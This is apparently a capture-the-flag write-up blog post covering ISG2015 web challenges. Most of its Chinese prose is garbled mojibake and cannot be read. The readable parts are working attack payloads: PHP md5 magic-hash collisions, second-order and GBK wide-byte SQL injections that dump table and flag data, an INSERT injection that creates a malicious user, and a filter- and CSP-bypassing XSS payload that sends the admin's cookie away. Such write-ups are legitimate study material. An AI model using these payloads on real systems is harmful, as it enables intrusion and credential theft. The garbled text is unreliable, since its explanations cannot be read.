LoRexxar's Blog

ISG2015_writeup

2015/11/17

鍓嶆鏃堕棿涓鐩村繖浜庡悇绉嶄簨锛屾渶杩戝垰濂芥湁鏃堕棿锛屾墍浠ヨ繕鏄荤粨涓媔sg鐨剋eb棰樼洰锛岄伩鍏嶄互鍚庡繕璁扳

WEB

WEB 50 collision(php 寮辩被鍨嬶級

娌′粈涔堝彲璇寸殑锛屽墠娈垫椂闂撮亣鍒拌繃鐨勯鐩紝鐢变簬php鐨勫急绫诲瀷鍒ゆ柇锛屾墍浠ュ鏋滀紶鍏ヤ袱涓肩殑md5鍊奸兘涓0e寮澶达紝灏变細鍑虹幇0 == 0锛岀粫杩囧垽鏂

md5(鈥240610708鈥) 鈥榮 result is 0e462097431906509019562988736854.

md5(鈥楺NKCDZO鈥) 鈥榮 result is 0e830400451993494058024219903391.

web 150 array (鏁扮粍key涓婇檺姣旇緝鎴柇锛

鍒╃敤鐨勬槸php鏁扮粍姣旇緝鐨勬椂鍊檏ey浼氭埅鏂殑bug銆倁ser[4294967296]鏃,鍗冲彲缁曡繃鏉′欢闄愬埗銆傚墿涓嬪氨鏄垎鐮存椂闂存埑銆
杩欓噷鏈変袱涓摼鎺

https://bugs.php.net/bug.php?id=69892
http://www.sektioneins.de/blog/15-07-31-php_challenge_2015.html

webdroid 200 (php 寮辩被鍨嬫瘮杈冿級

棰樼洰鏄皝瑁呭湪涓涓猘pk閲岄潰鐨勶紝鎵浠ュ綋鏃跺仛棰樼洰鐨勬椂鍊欎篃娌℃兂杩囪鎵撳紑鐪嬬湅锛屼絾鍏跺疄棰樼洰寰堢畝鍗曪紝鍦╝pk鍙互鍙戠幇涓涓帴鍙o紝鎻愪氦鐨剆ecret浼氬垽鏂拰鏈嶅姟鍣ㄦ槸鍚︾浉鍚岋紝閫氳繃json鏂瑰紡鍙戝寘锛屼竴鑸潵璇达紝浼犲叆鐨勫瓧绗︿細琚綋浣滃瓧绗︿覆锛屼絾鏄繖閲岀粡杩噅son_decode锛屼細鎭㈠鏁版嵁绫诲瀷锛岃繖閲屽氨鍙互鍒╃敤php鐨勫急绫诲瀷姣旇緝锛宲hp瀹樻柟鏂囨。閲屽叧浜庡急绫诲瀷姣旇緝鐨勯儴鍒嗘槸杩欐牱鐨勶細

injection (浜屾娉ㄥ叆锛

閮ㄥ垎婧愮爜缁欏嚭鏄繖鏍风殑锛

1
2
3
4
5
if($_GET['search']){
$username = $_SESSION['username'];
$title = mysql_real_escape_string($_GET['search']);
$sql = "select * from posts where username='$username' and title like '$title'";
$result = mysql_query($sql);

杩欓噷閫氳繃鐪嬩簡澶х墰鐨剋riteup锛岃鎴戣璇嗗埌浜嗕笉鍚屾柟寮忕殑娉ㄥ叆锛岃繖閲屽氨鐢ㄤ簡涓涓濡欑殑鏂瑰紡bypass銆

search鐨勬椂鍊欎細鎶$_SESSION['username']鐩存帴甯﹀叆璇彞涓紝鑰$_SESSION['username']鏉ヨ嚜鏁版嵁搴撱傜▼搴忚繘琛屼簡涓ゆescape锛屽鑷存病娉曠洿鎺ヤ簩娆℃敞鍏ャ傝冭檻鐢ㄦ暟鎹簱瀛楁闀垮害鐨勬埅鏂潵bypass銆

棣栧厛fuzz鍑烘暟鎹簱username瀛楁鐨勯暱搴,鐒跺悗鎶婃渶鍚庝竴浣嶆敼涓篭,杩欐牱缁忚繃 php 杞箟涔嬪悗灏辨垚浜哱,浣嗘槸鍥犱负\鍏ュ簱鐨勬椂鍊欏瓧娈 闀垮害闄愬埗鍙兘鐣欎笅涓涓猏,杩欐牱绛夊啀娆 select 鍑烘潵鐨勬椂鍊欏氨鑳介冮稿崟寮曞彿浜嗐

娉ㄥ唽鐧婚檰鍚庣洿鎺earch鍑篺lag锛

1
index.php?search=%20union%20select%201,2,(select%20flag%20from%20flag),4%23

shell 250 (鐗规畩鐢ㄦ埛鍚嶅鑷存枃浠朵笂浼犳紡娲烇級

涓婁紶鍚庣殑鏂囦欢浼氳閲嶅懡鍚嶏紝鏂囦欢鍚嶄笌娉ㄥ唽鐨勭敤鎴峰悕鏈夊叧锛岃岀敤鎴峰悕鍋氫簡姝e垯鍒ゆ柇锛屼笉鍏佽鐗规畩瀛楃銆傚綋鏃跺彧鍙戠幇浜嗚繖涔堝嚑鐐癸紝鍚庢潵鐪媤riteup鎵嶇煡閬擄細

鍦ㄦ敞鍐岀殑email澶勬湁娉ㄥ叆锛屽彲浠ョ敤insert娉ㄥ叆鎻掑叆澶氳锛岄澶栨柊寤轰竴涓猻alt.php鐨勭敤鎴凤紝鍒╃敤Apache鐨勮В鏋愰棶棰樺嵆鍙幏鍙杅lag銆

1
md5@salt.com','1'),('salt.php',md5('salt'),'2','2')#

xssme 500 (澶氭url缂栫爜缁曡繃鐗规畩瀛楃杩囨护锛

棰樼洰鏄繖鏍风殑锛
1銆佽鐢ㄦ渶鏂扮増chrome娴嬭瘯
2銆佹渶缁堢殑payload鐨勫舰寮忔槸涓涓猽rl锛宲ayload浼氬湪绔欏唴瑙﹀彂锛岃涓嶈鍙戦佸埌鎴戠殑閭銆
3銆乤dmin鍙細鐐逛綘鍙戣繃鍘荤殑鏈珯鍐卽rl锛屼换浣曚笉鏄痷rl鐨勪笢瑗块兘涓嶄細鍘荤銆傚彟澶朼dmin涓嶈兘璁块棶澶栭儴鐨勬湇鍔″櫒銆

鎵撳紑棰樼洰绋嶅井娴嬭瘯浜嗕笅锛屽彂鐜板ぇ閮ㄥ垎鏈夌敤鐨勫瓧绗︾粺缁熻杩囨护锛岃屼笖script鍜宱n涔熻杩囨护锛屼絾鏄繕鏄勾杞伙紝鏈兘浠ヤ负鏀瑰彉澶у皬鍐欒偗瀹氭病鐢紝鎵浠ュ綋鏃舵病鏈夎瘯杩囷紝浣嗘槸棰樼洰鍏跺疄杩樻槸鏈変笉灏戝潙锛屼笉浠呬粎鏄脊绐楀氨鍙互寰楀埌flag锛
1銆佹浛鎹cript锛屽綋鐒跺彲浠ョ敤scscriptript缁曡繃锛岃繖鏍烽『甯︽妸chrome鑷甫鐨剎ss filter缁曡繃浜嗐
2銆佸惎鐢ㄤ簡CSP锛屽彧鍏佽寮曠敤鏈珯鑴氭湰銆傚埄鐢ㄥ洖鏄剧殑鐐癸紝鏋勯犲嚭xsspayload锛屽浣欑殑鎶ラ敊淇℃伅闇瑕佹敞閲婃帀銆
3銆乽rl缂栫爜銆傚洜涓轰細娑夊強鍒颁竴涓〉闈㈢殑澶氭宓屽寮曠敤锛宲ayload閲屽摢浜涘湴鏂归渶瑕佺紪鐮佸摢浜涗笉鐢ㄨ鎯虫竻妤氥
4銆乻erver闄愬埗浜嗕笉鑳借闂缃戯紝鑰冭檻璁゛dmin鍙戜俊鎭粰鑷繁灏唜ss寰楀埌鐨勬晱鎰熶俊鎭繑鍥炪
5銆乸ayload瑕佸彂閫佺粰admin锛岃繖鏃跺欏張浼氱粡杩囦竴娆cript鏇挎崲銆

鎵浠ョ患鍚堣捣鏉ayload灏辨槸杩欐牱鐨

1
http://202.120.7.136:8888/html/index.php?action=send&content=%3Cscrscriscriptptipt%20src%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26to=*/%26content%3Dwindow.location%253D%2522http%253A//202.120.7.136:8888/html/index.php%253Faction%253Dsend%2526content%253D%2522%252Bdocument.cookie%252B%2522%2526to%253Dmd5_salt%2522/*%22%3E%3C/scscrscriptiptript%3E

杩欐牱鐪嬩笉澶竻鏅帮紝璁╂垜浠瑄rl瑙g爜涓嬪氨鑳界湅鍑虹鍊簡

1
<scrscriscriptptipt src="http://202.120.7.136:8888/html/index.php?action=send&to=*/&content=window.location%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26content%3D%22%2Bdocument.cookie%2B%22%26to%3Dmd5_salt%22/*"></scscrscriptiptript>

鍐嶅幓鎺夎繃婊わ細

1
<script src="http://202.120.7.136:8888/html/index.php?action=send&to=*/&content=window.location%3D%22http%3A//202.120.7.136:8888/html/index.php%3Faction%3Dsend%26content%3D%22%2Bdocument.cookie%2B%22%26to%3Dmd5_salt%22/*"></script>

admin鐪嬪埌鍚庝細鎵撳紑骞跺彂閫

1
window.location="http://202.120.7.136:8888/html/index.php?action=send&content="+document.cookie+"&to=md5_salt"

杩欐牱灏辫兘鑾峰彇admin鐨刦lag浜

Fruit Store(200) (瀹藉瓧鑺傛敞鍏ワ級

棰樼洰涓嶉毦锛屽彧瑕佹壘鍒版敞鍏ョ偣灏卞緢瀹规槗璺戝嚭flag銆
杩欓噷涓昏鐢ㄥ埌鐨勬槸%df鐨勫瀛楄妭锛屽惉璇存墧杩泂qlmap閮藉彲浠ョ洿鎺ヨ窇鍑烘潵锛

鍏堣窇琛ㄥ悕锛

1
http://202.120.7.140:8888/try.php?fruit=flag%df%27+and+1=2+union+select+group_concat(distinct+table_name),2+from+information_schema.tables+where+table_schema=database()%23

fruit,tell_me_who_u_are
鍐嶈窇鍒楀悕锛

1
flag%df%27+and+1=2+union+select+group_concat(distinct+column_name),2+from+information_schema.columns+where+table_name=0x74656c6c5f6d655f77686f5f755f617265%23

flag
鏈鍚庢煡鏌ョ湅

1
flag%df%27+and+1=2+union+select+group_concat(flag),2+from+tell_me_who_u_are%23

get!

SuperAdmin(250) (%0a杩囨敞鍐 鍙橀噺瑕嗙洊锛


鍦ㄦ敞鍐岄〉闈腑灏濊瘯admin鍔犱笂澶氫釜锛0a娉ㄥ唽锛岀櫥褰曪紝缁曡繃浜哸dmin鐨勬鏌ャ傚緱鍒版彁绀猴紝鍙湁鏈湴鐢ㄦ埛鍙互寰楀埌璋冭瘯淇℃伅锛屼簬鏄皢XXF鏀规垚127.0.0.1锛屽緱鍒板涓嬭皟璇曚俊鎭細

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
function runmagicquotes(&$svar){
if(!getmagicquotesgpc()){
if( isarray($svar) ){
foreach($ svar as $k => $v)
$svar[$k] = runmagicquotes($v);
}
else{
$svar = addslashes($svar);
}
}
return $svar;
}
...... ......
register($username, $password, $email, $is_super);

瀛樺湪鍏ㄥ眬鍙橀噺瑕嗙洊鐨勯棶棰橈紝閲嶆柊娉ㄥ唽admin鍔犱笂澶氫釜锛0a鐨勮处鍙凤紝鍔犱釜is_super锛1鐨勫弬鏁帮紝鐧诲綍寰楀埌flag

web鐨勯鐩ぇ姒傚氨杩欎箞澶氫簡锛岃櫧鐒惰繖娆℃垚缁╀笉濂斤紝浣嗘槸杩樻槸瑙佽瘑浜嗗緢澶氭病鏈夎杩囩殑涓滆タ锛屼篃绠楁槸寮蹇冧簡锛屽敮涓鍙儨鐨勫氨鏄渶鍚102鍚嶏紝娌¤兘鎷垮埌100鐨勮瘉涔︺備笉杩囷紝绠′粬鍛

CATALOG
  1. 1. WEB
    1. 1.1. WEB 50 collision(php 寮辩被鍨嬶級
    2. 1.2. web 150 array (鏁扮粍key涓婇檺姣旇緝鎴柇锛
    3. 1.3. webdroid 200 (php 寮辩被鍨嬫瘮杈冿級
    4. 1.4. injection (浜屾娉ㄥ叆锛
    5. 1.5. shell 250 (鐗规畩鐢ㄦ埛鍚嶅鑷存枃浠朵笂浼犳紡娲烇級
    6. 1.6. xssme 500 (澶氭url缂栫爜缁曡繃鐗规畩瀛楃杩囨护锛
    7. 1.7. Fruit Store(200) (瀹藉瓧鑺傛敞鍏ワ級
    8. 1.8. SuperAdmin(250) (%0a杩囨敞鍐 鍙橀噺瑕嗙洊锛